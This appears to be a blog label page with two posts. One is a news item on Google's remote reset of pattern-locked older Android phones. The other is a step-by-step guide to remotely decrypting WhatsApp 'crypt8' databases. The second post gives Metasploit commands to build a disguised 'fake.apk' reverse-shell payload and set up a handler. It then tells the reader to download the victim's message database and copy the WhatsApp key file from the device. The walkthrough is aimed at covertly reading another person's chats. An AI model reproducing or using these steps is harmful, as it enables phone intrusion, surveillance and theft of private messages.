Showing posts with label remote hacking. Show all posts
Showing posts with label remote hacking. Show all posts

Friday, November 27, 2015

Here's How Google Can "Remotely Bypass" Pattern Lock Of Android Device



Older versions of Android can be remotely reset by Google if the company is issued with a court order, but only if they're locked using a pattern. 

This is according to a document prepared by the New York District Attorney's Office which revealed just how easily investigators could see the contents of a device.

Devices running Android 5.0 and newer cannot be remotely reset as they use full disk encryption.

However, this option is not switched on by default.

The report found any device using an older version of the operating system is vulnerable to remote reset and according to the Android Developer Dashboard, this is 74.1 per cent of Android devices currently being used.

However, this figure is slightly misleading. 

The remote reset feature does apply to phones running operating systems before Android L, but it only applies to people how have secured their device with a pattern.

Google can't remotely reset phones secured with a PIN or passcode, meaning the number of affected devices could be lower.  

A post from Google's Adrian Ludwig attempted to clarify the situation.
He said: 'Google has no ability to facilitate unlocking any device that has been protected with a PIN, Password, or fingerprint. 

'This is the case whether or not the device is encrypted, and for all versions of Android.

'Google also does not have any mechanism to facilitate access to devices that have been encrypted (whether encrypted by the user, as has been available since Android 3.0 for all Android devices, or encrypted by default, as has been available since Android 5.0 on select devices).

'There are some devicesthat have been configured to use a "pattern" to unlock. Until Android L, "pattern" unlock did provide a recovery option with the Google account. 

'This recovery feature was discontinued with Android L.

'Also, the lost pattern recovery feature never applied to PIN or Password so if you are on an earlier model device and don't want to use the pattern recovery feature, you can switch to a PIN or Password and it will be disabled.' 

However, the report insists that forensic examiners are able to bypass passcodes on devices using a 'variety of forensic techniques.'
Posted by at No comments:
Labels: , , , , , ,

Monday, October 5, 2015

How To Remotely Decrypt The Whatsapp Database "crypt8"

Before starting the database decryption process,first obtain remote access to android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk

[ Lhost=Attacker IP address, Lport=local port ]
This command will generate fake.apk in home directory.

2. Type: msfconsole
This command will start the metasploit framework.

3. Type: use exploit/multi/handler
In order to get multiple session on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from victim to attacker computer.

5. Type: show options
It will show the available options like lhost,lport

6. Set LHOST=192.168.0.2

7. Set LPORT=81

8. EXPLOIT


Now Run the app created in step 1 on your android phone and you'll get a meterpreter session 

Also see:How to hack wifi using social engineering technique

After getting the meterpreter session type below command to download the file:
  • cd /
  • cd /sdcard/WhatsApp
  • ls (Print the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded, now we need key to decrypt the database.
Follow the below command to Obtain the key for databases
  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download
(Means copy the file 'key' to sdcard>Download folder)

After obtaining the databases and key,Download the simple Github tool to decrpt the databases:
  • Open the application (in windows).
  • Click FIle, then on 'Decrypt .crypt8'
  • In the box, provide the Key file and Database.
  • Click OK, you will see that a 'msgstore.decrypted' file has appeared at your desktop.


  • Open it using the same application, go to 'File' then 'Open'.
  • Provide the Decrypted file generated on desktop, leave the Account name and  the 'wa.db', blank
  • Click 'OK'
  • Now you will see the contact no with the chat details
Note: Rooted smartphone is required to gain database and key from smartphone.

Posted by at No comments:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)